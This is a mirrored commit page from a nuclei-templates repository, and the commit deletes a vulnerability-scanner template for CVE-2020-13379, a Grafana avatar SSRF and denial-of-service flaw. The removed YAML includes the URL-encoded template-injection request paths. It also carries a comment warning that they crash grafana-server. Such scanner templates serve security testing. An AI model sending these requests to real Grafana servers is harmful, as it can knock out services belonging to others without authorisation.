daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Removing cve-2020-13379

patch-1
bauthard 2020-09-27 13:59:33 +05:30
parent 0d7e3454ca
commit a2d60bbd1e
1 changed files with 0 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
cves/CVE-2020-13379.yaml
View File

@ -1,22 +0,0 @@
id: cve-2020-13379
info:
name: Unauthenticated Grafana DoS
author: pxmme1337
severity: medium
description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client.
# Source:- https://www.exploit-db.com/exploits/48638
# WARNING
# This vulnerability results in complete crashing of the grafana-server application.
requests:
- method: GET
path:
- '{{BaseURL}}avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
- '{{BaseURL}}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
- "{{BaseURL}}/"
matchers:
- type: status
status:
- 502